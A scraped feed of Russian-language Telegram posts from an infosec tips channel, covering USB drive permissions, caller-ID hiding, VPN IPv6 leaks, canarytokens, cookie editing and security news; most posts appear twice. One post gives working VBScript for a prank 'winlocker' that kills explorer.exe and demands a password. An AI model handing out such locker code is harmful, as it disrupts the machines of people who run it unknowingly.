Защищаем информацию на флешке
В 21 веке без информации человек попросту не может существовать.
Мы передаем ее в сети, загружаем на различные сервисы и очень часто прибегаем к портативным носителям информации-USB -флеш -накопителям.
Но как же защитить информацию на них? Ведь такой маленький, но важный гаджет легко потерять, а информация на нем может попасть не в те руки.
1.Вам потребуется флешка на файловой системе NTFS
Это самая популярная система,так что скорее всего у вас есть такая флешка
2.На разделе диска нажимаем правой клавиши мышки. Выбираем ''свойства'' и переходим на вкладку ''безопасность''. В ней кликаем на ''изменить''
3.В открывшемся окне ставьте галочки во вкладке ''запретить''
4.Применяем изменения.Нажимаем ''ок''
Теперь при попытки зайти на флешку у пользователя будет отказано в доступе.
Чтобы получить доступ к флешки опять заходим во вкладку ''безопасность''. Нажимаем ''Дополнительно''
Во вкладке ''Тип'' меня с ''запрещено'' на ''разрешено''
Данный способ выручит вас, если флешка попала вам в руки совсем недавно и у вас нет времени устанавливать сторонние программы.
Например BitLocker (установлен только в Windows 10 pro) или VeraCrypt
В 21 веке без информации человек попросту не может существовать.
Мы передаем ее в сети, загружаем на различные сервисы и очень часто прибегаем к портативным носителям информации-USB -флеш -накопителям.
Но как же защитить информацию на них? Ведь такой маленький, но важный гаджет легко потерять, а информация на нем может попасть не в те руки.
1.Вам потребуется флешка на файловой системе NTFS
Это самая популярная система,так что скорее всего у вас есть такая флешка
2.На разделе диска нажимаем правой клавиши мышки. Выбираем ''свойства'' и переходим на вкладку ''безопасность''. В ней кликаем на ''изменить''
3.В открывшемся окне ставьте галочки во вкладке ''запретить''
4.Применяем изменения.Нажимаем ''ок''
Теперь при попытки зайти на флешку у пользователя будет отказано в доступе.
Чтобы получить доступ к флешки опять заходим во вкладку ''безопасность''. Нажимаем ''Дополнительно''
Во вкладке ''Тип'' меня с ''запрещено'' на ''разрешено''
Данный способ выручит вас, если флешка попала вам в руки совсем недавно и у вас нет времени устанавливать сторонние программы.
Например BitLocker (установлен только в Windows 10 pro) или VeraCrypt
This media is not supported in your browser
VIEW IN TELEGRAM
Как скрыть свой номер при звонке на Android
Приветствую читателей Cmd!
Бывает, что нужно скрыть свой номер телефона при звонке, и многие задаются вопросом: "Как же это сделать?"
Тут все довольно просто и установка дополнительных программ не требуется.
Заходим в "Телефон", нажимаем на 3 точки (Меню), Далее выбираем "Дополнительные
услуги" (У вас может называться по другому, допустим "Расширенные
настройки"), и видим пункт "Отображение номера абонента" (Может называться по другому), нажимаем на него, и жмем на "Скрыть номер".
Если у вас заблокирована эта функция, то нужно ее активировать, для этого переходим СЮДА, смотрим код для вашего оператора, и активируем "Антиопределитель", после этого повторите действия выше еще раз.
В итоге Абонент , которому вы звоните, не увидит ваш номер.
Приветствую читателей Cmd!
Бывает, что нужно скрыть свой номер телефона при звонке, и многие задаются вопросом: "Как же это сделать?"
Тут все довольно просто и установка дополнительных программ не требуется.
Заходим в "Телефон", нажимаем на 3 точки (Меню), Далее выбираем "Дополнительные
услуги" (У вас может называться по другому, допустим "Расширенные
настройки"), и видим пункт "Отображение номера абонента" (Может называться по другому), нажимаем на него, и жмем на "Скрыть номер".
Если у вас заблокирована эта функция, то нужно ее активировать, для этого переходим СЮДА, смотрим код для вашего оператора, и активируем "Антиопределитель", после этого повторите действия выше еще раз.
В итоге Абонент , которому вы звоните, не увидит ваш номер.
Вот почему нужно серьезнее относится к выбору VPN
Когда устройство подключается к Интернету, оно получает один или несколько адресов в сети. Зачастую ваше устройство получает как IPv4-адрес, так и IPv6-адрес. IPv6 является более новым сетевым стандартом, предназначенным для подключения к гораздо большей сети подключенных устройств, чем старый, более широко используемый протокол IPv4.
Протокол IPv4 имеет запись в виде четырёх десятичных чисел значением от 0 до 255, разделённых точками, например, 192.168.0.3.
В 6-й версии IP-адрес (IPv6) является 128-битовым. Внутри адреса разделителем является двоеточие (напр. 2001:0db8:85a3:0000:0000:8a2e:0370:7334).
А теперь внимание:
Многие реализации VPN не ПОДДЕРЖИВАЮТ или, что еще хуже, ПОЛНОСТЬЮ ИГНОРИРУЮТ протокол IPv6. То есть, VPN сервер не может выполнить свою работу скрыть ваш реальный ip адрес и зашифровать данные. Поэтому вы, того не ведая, работаете прямо с таким сайтом. Следовательно, владелец такого сайта видит ваш реальный IP плюс ваш провайдер знает, что вы ходили на этот сайт.
Проверять IP адрес cайта можно с помощью этого онлайн-сервиса. http://t.co/pahhvVh4zd в поле domain or IP address введите URL проверяемого сайта. Если он имеет адрес с двоеточиями, то он имеет протокол IPv6. Следовательно, если ваш VPN его не поддерживает, владелец сайта узнает ваш IP, а провайдер увидит, что вы делаете на этом сайте.
Когда устройство подключается к Интернету, оно получает один или несколько адресов в сети. Зачастую ваше устройство получает как IPv4-адрес, так и IPv6-адрес. IPv6 является более новым сетевым стандартом, предназначенным для подключения к гораздо большей сети подключенных устройств, чем старый, более широко используемый протокол IPv4.
Протокол IPv4 имеет запись в виде четырёх десятичных чисел значением от 0 до 255, разделённых точками, например, 192.168.0.3.
В 6-й версии IP-адрес (IPv6) является 128-битовым. Внутри адреса разделителем является двоеточие (напр. 2001:0db8:85a3:0000:0000:8a2e:0370:7334).
А теперь внимание:
Многие реализации VPN не ПОДДЕРЖИВАЮТ или, что еще хуже, ПОЛНОСТЬЮ ИГНОРИРУЮТ протокол IPv6. То есть, VPN сервер не может выполнить свою работу скрыть ваш реальный ip адрес и зашифровать данные. Поэтому вы, того не ведая, работаете прямо с таким сайтом. Следовательно, владелец такого сайта видит ваш реальный IP плюс ваш провайдер знает, что вы ходили на этот сайт.
Проверять IP адрес cайта можно с помощью этого онлайн-сервиса. http://t.co/pahhvVh4zd в поле domain or IP address введите URL проверяемого сайта. Если он имеет адрес с двоеточиями, то он имеет протокол IPv6. Следовательно, если ваш VPN его не поддерживает, владелец сайта узнает ваш IP, а провайдер увидит, что вы делаете на этом сайте.
Что знают Мобильные операторы?
Мобильные операторы получают массу данных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, вы сможете отследить всю цепочку прохождения информации от звонка до списания денег.
Недавно стало известно, что сотовый оператор России – "МТС" рассылает банкам на e-mail, любопытное рекламное предложение. Из него следует, что за совсем символическую сумму в масштабах подобного бизнеса можно приобрести целый массив данных.
Компании с помощью активной сим-карты уже научились отслеживать не только наше местоположение, но и популярные маршруты, любимые магазины и кафе. Они знают всё о наших тратах и всех транзакциях, покупках и о увлечениях с помощью анализа нашего траффика через мобильный браузер. С большой вероятностью и эти данные легко продаются, но уже в своих нишах, а не только банковской сфере.
К сожалению, мы уже давно перешагнули границу, когда наши персональные данные были действительно “персональными”. Сейчас ей владеют абсолютно другие лица, и именно они зарабатывают на этом.
Мобильные операторы получают массу данных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, вы сможете отследить всю цепочку прохождения информации от звонка до списания денег.
Недавно стало известно, что сотовый оператор России – "МТС" рассылает банкам на e-mail, любопытное рекламное предложение. Из него следует, что за совсем символическую сумму в масштабах подобного бизнеса можно приобрести целый массив данных.
Компании с помощью активной сим-карты уже научились отслеживать не только наше местоположение, но и популярные маршруты, любимые магазины и кафе. Они знают всё о наших тратах и всех транзакциях, покупках и о увлечениях с помощью анализа нашего траффика через мобильный браузер. С большой вероятностью и эти данные легко продаются, но уже в своих нишах, а не только банковской сфере.
К сожалению, мы уже давно перешагнули границу, когда наши персональные данные были действительно “персональными”. Сейчас ей владеют абсолютно другие лица, и именно они зарабатывают на этом.
Участники движения Anonymous назвали TikTok шпионским ПО властей Китая
Активисты движения Anonymous обвинили популярный китайский сервис TikTok в массовой слежке за пользователями и передаче данных властям Китая.
«Скажем так, каждый подписанный на нас пользователь Twitter может поставить лайк какому-то твиту. Потом через 5 лет вы посетите Китай и вас арестуют. Еще вероятнее, что ваши финансовые буду похищены, скомпрометированы, и вами будут манипулировать», — сообщили участники Anonymous.
Пользователь Reddit проанализировал принцип работы приложения и выяснил, что TikTok собирает сведения не только о контактах пользователях, но также другие данные об устройстве, а именно:
-тип процессора и серийный номер
-информацию об установленных программах, точках доступа Wi-Fi, IP-адресе и пр.
-данные о месторасположении пользователя каждые 30 секунд,
-данные из буфера обмена (каждые несколько секунд)
Даже не знаю, с одной стороны TikTok молодое приложение и рекламу туда действительно сложно интегрировать, поэтому производить сбор данных пользователей это нормальная практика, но вот зачем собирать настолько конфиденциальную информацию, не понятно 😡
Активисты движения Anonymous обвинили популярный китайский сервис TikTok в массовой слежке за пользователями и передаче данных властям Китая.
«Скажем так, каждый подписанный на нас пользователь Twitter может поставить лайк какому-то твиту. Потом через 5 лет вы посетите Китай и вас арестуют. Еще вероятнее, что ваши финансовые буду похищены, скомпрометированы, и вами будут манипулировать», — сообщили участники Anonymous.
Пользователь Reddit проанализировал принцип работы приложения и выяснил, что TikTok собирает сведения не только о контактах пользователях, но также другие данные об устройстве, а именно:
-тип процессора и серийный номер
-информацию об установленных программах, точках доступа Wi-Fi, IP-адресе и пр.
-данные о месторасположении пользователя каждые 30 секунд,
-данные из буфера обмена (каждые несколько секунд)
Даже не знаю, с одной стороны TikTok молодое приложение и рекламу туда действительно сложно интегрировать, поэтому производить сбор данных пользователей это нормальная практика, но вот зачем собирать настолько конфиденциальную информацию, не понятно 😡
This media is not supported in your browser
VIEW IN TELEGRAM
Создаем ловушку для хакера
Привет, читатель Cmd
Сегодня мы рассмотрим, как расставить "ловушки" на вашем пк. С помощью сервиса canarytokens мы создадим файл, при открытии которого к нам на почту моментально придет полная информация о том, кто его открыл.
Хочу внести ясность.
Если кто-то сумел проникнуть в нашу систему, то он наверняка позаботился о своей анонимности и безопасности. Но так как мы будем в курсе незваного гостя, то сможем предотвратить утечку данных.
И еще один момент. Сервис canarytokens проверенный. В файл просто вшит токен. Токен - это средство идентификации. Поэтому переживать, что сервис стянет ваши данные не стоит.
Переходим на сайт > выбираем в каком файле будет вшит токен (например, microsoft word) > указываем почту на которую придет оповещение о проникновении при открытии файла > пишем любое описание. Скачиваем наш файл и называем его очень заманчиво и креативно. Также можно заполнить его по ключевым словам (password, key, cvv и тд).
https://canarytokens.org/generate
Привет, читатель Cmd
Сегодня мы рассмотрим, как расставить "ловушки" на вашем пк. С помощью сервиса canarytokens мы создадим файл, при открытии которого к нам на почту моментально придет полная информация о том, кто его открыл.
Хочу внести ясность.
Если кто-то сумел проникнуть в нашу систему, то он наверняка позаботился о своей анонимности и безопасности. Но так как мы будем в курсе незваного гостя, то сможем предотвратить утечку данных.
И еще один момент. Сервис canarytokens проверенный. В файл просто вшит токен. Токен - это средство идентификации. Поэтому переживать, что сервис стянет ваши данные не стоит.
Переходим на сайт > выбираем в каком файле будет вшит токен (например, microsoft word) > указываем почту на которую придет оповещение о проникновении при открытии файла > пишем любое описание. Скачиваем наш файл и называем его очень заманчиво и креативно. Также можно заполнить его по ключевым словам (password, key, cvv и тд).
https://canarytokens.org/generate
Google заканчивает эру Root прав на android!
Одним из главных преимуществ ОС Android является ее открытость – пользователи могут сами выбирать лаунчеры и приложения по умолчанию, а также получать права суперпользователя и устанавливать свои версии прошивки. Но ребятки из google решили уйти в сторону безопасности и покончить с рутированием своей мобильной ОС.
Для установки кастомизированной прошивки нужно разблокировать загрузчик ОС, что поддерживается (но не рекомендуется) некоторыми производителями электроники, в частности Sony. Однако последняя версия SafetyNet от Google будет воспринимать подобные действия как взлом.
SafetyNet - это механизм, используемый приложениями в Google Play Store для обнаружения вредоносных программ. SafetyNet жизненно необходим банковскому, финансовому ПО и другим приложениям. Раньше SafertyNet можно было "убедить" и получить рут права без проблем будто смартфон не был взломан. Однако с новой версией SafetyNet они лишились такой возможности.
Иными словами, вам придется выбирать между комфортом и рутированием телефона. Получить рут права как бы можно, но из-за этого все важные приложения будут вам недоступны и пользоваться телефоном в повседневной жизни будет невозможно. Такие вот дела😪
Одним из главных преимуществ ОС Android является ее открытость – пользователи могут сами выбирать лаунчеры и приложения по умолчанию, а также получать права суперпользователя и устанавливать свои версии прошивки. Но ребятки из google решили уйти в сторону безопасности и покончить с рутированием своей мобильной ОС.
Для установки кастомизированной прошивки нужно разблокировать загрузчик ОС, что поддерживается (но не рекомендуется) некоторыми производителями электроники, в частности Sony. Однако последняя версия SafetyNet от Google будет воспринимать подобные действия как взлом.
SafetyNet - это механизм, используемый приложениями в Google Play Store для обнаружения вредоносных программ. SafetyNet жизненно необходим банковскому, финансовому ПО и другим приложениям. Раньше SafertyNet можно было "убедить" и получить рут права без проблем будто смартфон не был взломан. Однако с новой версией SafetyNet они лишились такой возможности.
Иными словами, вам придется выбирать между комфортом и рутированием телефона. Получить рут права как бы можно, но из-за этого все важные приложения будут вам недоступны и пользоваться телефоном в повседневной жизни будет невозможно. Такие вот дела😪
ezgif.com-gif-maker (15).gif
9.5 KB
Создаем собственный QR-код
Мы уже делали пост о создании QR-кода, в котором рассказали о довольно популярном в свое время методе мошенничества.
Сделали мы это с целью показать, что Quick Response Code может применяться абсолютно везде, зависит только от вашей фантазии.
Но вот только ресурс, который мы обозревали в прошлом посте не блистал функционалом. Поэтому держите новенький и хороший сайт с самым большим набором инструментов и фишек для создания qr-кода.
QR Code Generation позволяет зашифровать URL-адрес, текст, визитку, Эл.почту, sms-сообщение, WI-FI, Bitcoin кошелек, Facebook, PDF, MP3, фотографии
и много чего еще. Также можно выбрать и настроить дизайн вашего QR-кода.
Кроме того, многие другие возможности применения не требуют соединения смартфона с Интернетом. Можно шифровать записи календаря о предстоящих мероприятиях, WiFi-соединения или контактные данные в виде виртуальных визиток (vCard), и затем пользователь может сохранять их в свой мобильный телефон.
https://ru.qr-code-generator.com/
Мы уже делали пост о создании QR-кода, в котором рассказали о довольно популярном в свое время методе мошенничества.
Сделали мы это с целью показать, что Quick Response Code может применяться абсолютно везде, зависит только от вашей фантазии.
Но вот только ресурс, который мы обозревали в прошлом посте не блистал функционалом. Поэтому держите новенький и хороший сайт с самым большим набором инструментов и фишек для создания qr-кода.
QR Code Generation позволяет зашифровать URL-адрес, текст, визитку, Эл.почту, sms-сообщение, WI-FI, Bitcoin кошелек, Facebook, PDF, MP3, фотографии
и много чего еще. Также можно выбрать и настроить дизайн вашего QR-кода.
Кроме того, многие другие возможности применения не требуют соединения смартфона с Интернетом. Можно шифровать записи календаря о предстоящих мероприятиях, WiFi-соединения или контактные данные в виде виртуальных визиток (vCard), и затем пользователь может сохранять их в свой мобильный телефон.
https://ru.qr-code-generator.com/
25 приложений для Android воровали учетные данные Facebook
Двадцать пять приложений для операционной системы Android, которые можно было загрузить со страниц интернет-магазина Google Play Store, являются вредоносными. К такому выводу пришли специалисты французской компании Evina.
По их данным, пользователи успели загрузить вредоносы не менее 2,34 млн раз. Вирусы содержались в графических редакторах, обоях, шагомерах, играх, файловых менеджерах и других видах приложений. Несмотря на разные функции, все они похищали личные данные из Facebook.
Как пояснили специалисты, вредоносы точно созданы одной и той же группой хакеров, поскольку все программы содержали один и тот же код. Пользователи даже не подозревали, что при загрузке своего аккаунта в социальной сети на самом деле видели наложенную поверх браузера фальшивку, с которой их личные данные уходили в распоряжение третьих лиц.
Кстати, большинство приложений провисели в маркете более года и как их пропустил и оставил гугл остается только догадываться. Мне вообще кажется, что малварь нашли сами пользователи, а уже потом специалисты компании Evina😳
P.S список зараженных малварью приложений и пример фиш страницы на фото👇
Двадцать пять приложений для операционной системы Android, которые можно было загрузить со страниц интернет-магазина Google Play Store, являются вредоносными. К такому выводу пришли специалисты французской компании Evina.
По их данным, пользователи успели загрузить вредоносы не менее 2,34 млн раз. Вирусы содержались в графических редакторах, обоях, шагомерах, играх, файловых менеджерах и других видах приложений. Несмотря на разные функции, все они похищали личные данные из Facebook.
Как пояснили специалисты, вредоносы точно созданы одной и той же группой хакеров, поскольку все программы содержали один и тот же код. Пользователи даже не подозревали, что при загрузке своего аккаунта в социальной сети на самом деле видели наложенную поверх браузера фальшивку, с которой их личные данные уходили в распоряжение третьих лиц.
Кстати, большинство приложений провисели в маркете более года и как их пропустил и оставил гугл остается только догадываться. Мне вообще кажется, что малварь нашли сами пользователи, а уже потом специалисты компании Evina😳
P.S список зараженных малварью приложений и пример фиш страницы на фото👇
This media is not supported in your browser
VIEW IN TELEGRAM
Отключаем вредоносные push-уведомления
Привет, читатель Cmd!
Думаю тебя, как и меня раздражают постоянно всплывающие окошки на сайтах, в которых предлагается разрешить показ уведомлений сайта.
В некоторых случаях под таким средством оповещения скрывается малварь. И тут неважно, разрешите ли вы отправку уведомлений или заблокируете. Если вы нажмете по всплывающему окну, то рискуете подхватить малварь
или сами того не понимая, дадите доступ к микрофону, местоположению и тд. Под назойливым оповещением может скрываться все, что угодно. Поэтому рекомендую отключить данную функцию.
В яндекс браузере
Зайдите в настройки > промотайте вниз до строки "сайты" > выберите пункт "Не показывать запрос на отправку"
В google chrome
Зайдите в настройки > перейдите в раздел "Конфиденциальность и безопасность" > выберете пункт "настройки сайта" > "Всплывающие окна и переадресация" и отключите функцию.
P.S Google сейчас борется с всплывающими окнами. Если у вас последняя версия браузера, функция отключения по умолчанию.
Привет, читатель Cmd!
Думаю тебя, как и меня раздражают постоянно всплывающие окошки на сайтах, в которых предлагается разрешить показ уведомлений сайта.
В некоторых случаях под таким средством оповещения скрывается малварь. И тут неважно, разрешите ли вы отправку уведомлений или заблокируете. Если вы нажмете по всплывающему окну, то рискуете подхватить малварь
или сами того не понимая, дадите доступ к микрофону, местоположению и тд. Под назойливым оповещением может скрываться все, что угодно. Поэтому рекомендую отключить данную функцию.
В яндекс браузере
Зайдите в настройки > промотайте вниз до строки "сайты" > выберите пункт "Не показывать запрос на отправку"
В google chrome
Зайдите в настройки > перейдите в раздел "Конфиденциальность и безопасность" > выберете пункт "настройки сайта" > "Всплывающие окна и переадресация" и отключите функцию.
P.S Google сейчас борется с всплывающими окнами. Если у вас последняя версия браузера, функция отключения по умолчанию.
Блокируем компьютер. Создаем собственный винлокер.
Давайте перенесемся на лет 5-6 назад и вспомним эру винлокеров.
На каждом форуме, сайте, треде, везде где можно прикрепить файл, люди скидывали винлок под видом читов или кряков.
Чем был вызван такой тренд не понятно, но было весело. Никто не хотел особо вредить. Мы тоже не будем.
Создадим за пару минут что-то типо винлокера, который будет блокировать рабочий стол и требовать ввести пароль.
Если мы предположим, что человек, который откроет наш винлок имеет пользовательский уровень владения пк и снимет наш винлок через диспетчер задач, то он молодец.
Вот только рабочий стол к нему не вернется и тут поможет только перезагрузка пк.
Открываем блокнот и вставляем туда код:
on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
do
password = InputBox ("Windows заблокирован редактором Cmd, капитулируйте")
Loop Until password = "12"
t.run"explorer"
Теперь сохраняем с расширением vbs (virus.vbs). На этом винлок готов. Пароль меняется в строке
Давайте перенесемся на лет 5-6 назад и вспомним эру винлокеров.
На каждом форуме, сайте, треде, везде где можно прикрепить файл, люди скидывали винлок под видом читов или кряков.
Чем был вызван такой тренд не понятно, но было весело. Никто не хотел особо вредить. Мы тоже не будем.
Создадим за пару минут что-то типо винлокера, который будет блокировать рабочий стол и требовать ввести пароль.
Если мы предположим, что человек, который откроет наш винлок имеет пользовательский уровень владения пк и снимет наш винлок через диспетчер задач, то он молодец.
Вот только рабочий стол к нему не вернется и тут поможет только перезагрузка пк.
Открываем блокнот и вставляем туда код:
on error resume next
set t=createobject("Wscript.Shell")
set kill = createobject("wscript.shell")
kill.run"taskkill /f /im explorer.exe",0
do
password = InputBox ("Windows заблокирован редактором Cmd, капитулируйте")
Loop Until password = "12"
t.run"explorer"
Теперь сохраняем с расширением vbs (virus.vbs). На этом винлок готов. Пароль меняется в строке
Loop Until password = "12"
Чтобы вернуть рабочий стол заходим в диспетчер задач > новая задача > пишем explorer.exeThis media is not supported in your browser
VIEW IN TELEGRAM
Расовые стереотипы добрались и до ИБ - сообщества
Вице-президент Google по инженерии Дэвид Кляйдермахер просит отказаться ИБ - сообщество
от терминов white hat и в особенности black hat из-за расовых стереотипов.
Обсуждение вопроса началось поздно ночью 3 июля, когда ответственный за Android Security и Google Play Store вице-президент Google по инженерии Дэвид Кляйдермахер (David Kleidermacher) отказался от своего запланированного выступление на конференции Black Hat USA 2020, которая должна пройти в следующем месяце. Объявив о своем решении, Кляйдермахер также призвал ИБ-сообщество рассмотреть
возможность замены терминов black hat, white hat и man-in-the-middle («человек посередине») нейтральными альтернативами.
Знаете, возможно мне сложно понять позицию Дэвида, в силу того, что я вырос на территории СНГ и с расизмом не особо сталкивался, но это уже перебор. Если они реально заменят термин "человек посередине", то как дальше жить то??🤐
Вице-президент Google по инженерии Дэвид Кляйдермахер просит отказаться ИБ - сообщество
от терминов white hat и в особенности black hat из-за расовых стереотипов.
Обсуждение вопроса началось поздно ночью 3 июля, когда ответственный за Android Security и Google Play Store вице-президент Google по инженерии Дэвид Кляйдермахер (David Kleidermacher) отказался от своего запланированного выступление на конференции Black Hat USA 2020, которая должна пройти в следующем месяце. Объявив о своем решении, Кляйдермахер также призвал ИБ-сообщество рассмотреть
возможность замены терминов black hat, white hat и man-in-the-middle («человек посередине») нейтральными альтернативами.
Знаете, возможно мне сложно понять позицию Дэвида, в силу того, что я вырос на территории СНГ и с расизмом не особо сталкивался, но это уже перебор. Если они реально заменят термин "человек посередине", то как дальше жить то??🤐
This media is not supported in your browser
VIEW IN TELEGRAM
Узнаем, собирают ли по нам информацию в интернете
Приветствую читателей Cmd!
Думаю многим интересно узнать, пытаются ли как-то найти вашу личную информацию в интернете.
Номер телефона, адрес проживания и много другой личной информации. За всем этим можно активно наблюдать с помощью сервиса Google alerts.
Данный проект от Google позволяет отслеживать любой поисковой запрос. Конечно как и в любом шпионе сразу не кто ничего не покажет, так как данные не собираются постоянно а только по запросу, когда вы создали задание собирать статистику.
Чтобы получать статистику по запросу или запросам, нужна почта на gmail.com аккаунт. После чего переходите на сервис Оповещения . Далее вы можете вести в строке в самом верху свой поисковый запрос или оставить из рекомендации.
То есть, вы можете создать статистику абсолютно по любым запросам и получать по ним информацию на вашу почту. Сервис очень хорош в плане отслеживания сбора и деанона вашей персональной информации.
https://www.google.ru/alerts
Приветствую читателей Cmd!
Думаю многим интересно узнать, пытаются ли как-то найти вашу личную информацию в интернете.
Номер телефона, адрес проживания и много другой личной информации. За всем этим можно активно наблюдать с помощью сервиса Google alerts.
Данный проект от Google позволяет отслеживать любой поисковой запрос. Конечно как и в любом шпионе сразу не кто ничего не покажет, так как данные не собираются постоянно а только по запросу, когда вы создали задание собирать статистику.
Чтобы получать статистику по запросу или запросам, нужна почта на gmail.com аккаунт. После чего переходите на сервис Оповещения . Далее вы можете вести в строке в самом верху свой поисковый запрос или оставить из рекомендации.
То есть, вы можете создать статистику абсолютно по любым запросам и получать по ним информацию на вашу почту. Сервис очень хорош в плане отслеживания сбора и деанона вашей персональной информации.
https://www.google.ru/alerts
This media is not supported in your browser
VIEW IN TELEGRAM
Тотальная слежка за coivd больными
Власти будут отслеживать местоположение заразившегося и составят список тех, кто находился
рядом с заболевшим и общался с ним по мобильной связи последние 14 дней
Минкомсвязь разработала регламент отслеживания контактов заразившихся коронавирусом на основе геолокации и данных мобильных операторов.
В документе отмечается, что за основу будут браться данные Минздрава о номере телефона больного COVID-19. После этого специальные алгоритмы составят список людей, которые находились вместе с больным, а также тех, кто контактировал с зараженным
посредством мобильной связи.
Не особо догоняю, как будет работать такая система и в чем ее смысл. То есть, если я живу в одном районе и связываюсь по мобильнику со своим другом, которые болеет covid'ом, то попадаю в список риска? У такой системы куча нюансов и статистика будет максимально не точной, но это лишь мое мнение.
Хотя итак понятно, зачем все это.
Власти будут отслеживать местоположение заразившегося и составят список тех, кто находился
рядом с заболевшим и общался с ним по мобильной связи последние 14 дней
Минкомсвязь разработала регламент отслеживания контактов заразившихся коронавирусом на основе геолокации и данных мобильных операторов.
В документе отмечается, что за основу будут браться данные Минздрава о номере телефона больного COVID-19. После этого специальные алгоритмы составят список людей, которые находились вместе с больным, а также тех, кто контактировал с зараженным
посредством мобильной связи.
Не особо догоняю, как будет работать такая система и в чем ее смысл. То есть, если я живу в одном районе и связываюсь по мобильнику со своим другом, которые болеет covid'ом, то попадаю в список риска? У такой системы куча нюансов и статистика будет максимально не точной, но это лишь мое мнение.
Хотя итак понятно, зачем все это.
Обманываем сайты. Подделываем куки
Всю нашу информацию веб-сайты держат в хранилище нашего браузера.
Так называемые Интернета «куки» - это текстовые файлы небольшого объема со служебной информацией для браузера. Иными словами сервер
обменивается с веб-обозревателем на ПК или мобильном гаджете данными о сайтах, которые посещал пользователь. Информация в куках может быть самой разной. Например, часто в таких файлах хранится статистика посещений, логин и пароль от сайтов или сервисов, индивидуальные
настройки пользователя (регион, дизайн оформления и прочее).
Расширение EditThisCookie позволяет добавлять, удалять, изменять, искать, защищать и блокировать cookie.
Расширение очень полезно при работе с большим количеством аккаунтов. Вам не нужно будет проходить аутентификацию, а просто быстро подменить куки.
Функция редактирования позволяет лишать различные сервисы показывать вам персонализируемую рекламу и полностью стирает ваш идентификатор.
Это лишь основные функции, которые будут полезны как обывателю, так и профи. По желанию, в расширении можно найти еще больше полезных функций.
Google Chrome: https://goo.su/1my6
Opera: https://goo.su/1MY6
Всю нашу информацию веб-сайты держат в хранилище нашего браузера.
Так называемые Интернета «куки» - это текстовые файлы небольшого объема со служебной информацией для браузера. Иными словами сервер
обменивается с веб-обозревателем на ПК или мобильном гаджете данными о сайтах, которые посещал пользователь. Информация в куках может быть самой разной. Например, часто в таких файлах хранится статистика посещений, логин и пароль от сайтов или сервисов, индивидуальные
настройки пользователя (регион, дизайн оформления и прочее).
Расширение EditThisCookie позволяет добавлять, удалять, изменять, искать, защищать и блокировать cookie.
Расширение очень полезно при работе с большим количеством аккаунтов. Вам не нужно будет проходить аутентификацию, а просто быстро подменить куки.
Функция редактирования позволяет лишать различные сервисы показывать вам персонализируемую рекламу и полностью стирает ваш идентификатор.
Это лишь основные функции, которые будут полезны как обывателю, так и профи. По желанию, в расширении можно найти еще больше полезных функций.
Google Chrome: https://goo.su/1my6
Opera: https://goo.su/1MY6
Казаха обвинили в продаже краденных данных крупных ИБ-компаний
Министерство юстиции США предъявило обвинение киберпреступнику, использующему псевдоним Fxmsp, который продавал доступ к компьютерным системам более чем трех сотен организаций по всему миру.
Согласно обвинительному заключению, подозреваемый вместе с сообщниками получил доступ к частным сетям посредством фишинговых атак и хищения паролей с помощью брутфорс-атак с открытых RDP-серверов. Взломав сеть, Fxmsp предположительно устанавливал вредоносное ПО для хищения паролей и трояны для удаленного доступа (RAT) с целью сбора учетных данных и обеспечения персистентности на системе.
В мае 2019 года Fxmsp выставил на продажу исходный код антивирусных программ и похищенные данные крупнейших ИБ-компаний США. По словам киберпреступника, он взломал системы компаний Symantec, McAfee и Trend Micro, а также получил доступ к более чем 30 ТБ данных последней.
Нормально так крутился парень, но человеческий фактор дал о себе знать. P.S микро-схема его действий на фото ниже👇
Министерство юстиции США предъявило обвинение киберпреступнику, использующему псевдоним Fxmsp, который продавал доступ к компьютерным системам более чем трех сотен организаций по всему миру.
Согласно обвинительному заключению, подозреваемый вместе с сообщниками получил доступ к частным сетям посредством фишинговых атак и хищения паролей с помощью брутфорс-атак с открытых RDP-серверов. Взломав сеть, Fxmsp предположительно устанавливал вредоносное ПО для хищения паролей и трояны для удаленного доступа (RAT) с целью сбора учетных данных и обеспечения персистентности на системе.
В мае 2019 года Fxmsp выставил на продажу исходный код антивирусных программ и похищенные данные крупнейших ИБ-компаний США. По словам киберпреступника, он взломал системы компаний Symantec, McAfee и Trend Micro, а также получил доступ к более чем 30 ТБ данных последней.
Нормально так крутился парень, но человеческий фактор дал о себе знать. P.S микро-схема его действий на фото ниже👇
This media is not supported in your browser
VIEW IN TELEGRAM
Сужаем поиск цели до предела
Приветствую читателей Cmd!
Сегодня поговорим о поисковике BoardReader, который позволяет сузить поле поиска до социальных площадок. Благодаря специальным фильтрам вы можете быстро находить посты и комментарии пользователей, которые соответствуют
вашим критериям: языку, дате публикации и названию сайта.
В плане OSINT'a сервис очень хорош. Если вы умеете собирать и анализировать собранную информацию, то BoarReader станет вашей правой рукой.
Также поисковик является отличным инструментом для SEO'шников . Вы можете анализировать, как реагируют массы пользователей сети на то или иное событие.
https://boardreader.com/
Приветствую читателей Cmd!
Сегодня поговорим о поисковике BoardReader, который позволяет сузить поле поиска до социальных площадок. Благодаря специальным фильтрам вы можете быстро находить посты и комментарии пользователей, которые соответствуют
вашим критериям: языку, дате публикации и названию сайта.
В плане OSINT'a сервис очень хорош. Если вы умеете собирать и анализировать собранную информацию, то BoarReader станет вашей правой рукой.
Также поисковик является отличным инструментом для SEO'шников . Вы можете анализировать, как реагируют массы пользователей сети на то или иное событие.
https://boardreader.com/
This media is not supported in your browser
VIEW IN TELEGRAM
Киберпреступники украли 500 тысяч евро путем угона SIM-карт
Испанская полиция задержала почти сто человек по обвинению в хищении полумиллиона евро при помощи интернет-мошенничества,
Для хищения денег использовался sim-свопинг - вид мошенничества, при котором преступник, узнав номер телефона жертвы, перевыпускает ее сим-карту, чтобы получить полный доступ к банковскому счету.
Операция проводилась в различных регионах страны, задержаны 94 человека, которым могут быть предъявлены обвинения в мошенничестве, отмывании денег, членстве в преступной группировке, подделке документов. Сумма похищенного составляет 504,8 тысячи евро, у одной из жертв с банковского счета были украдены 240 тысяч.
Вот это я понимаю реальная дырка в системе. Симка - это доступ ко всем ресурсам и аккаунтам пользователя, но при этом ее защита нулевая.
Почему в 2020 году люди нанимают дропов за 1 тыс рублей, в фотошопе рисуют доки и бегут перевыпускать симкарты?
Уважаемые сотовые операторы, остановите это безумие, плиз.
Испанская полиция задержала почти сто человек по обвинению в хищении полумиллиона евро при помощи интернет-мошенничества,
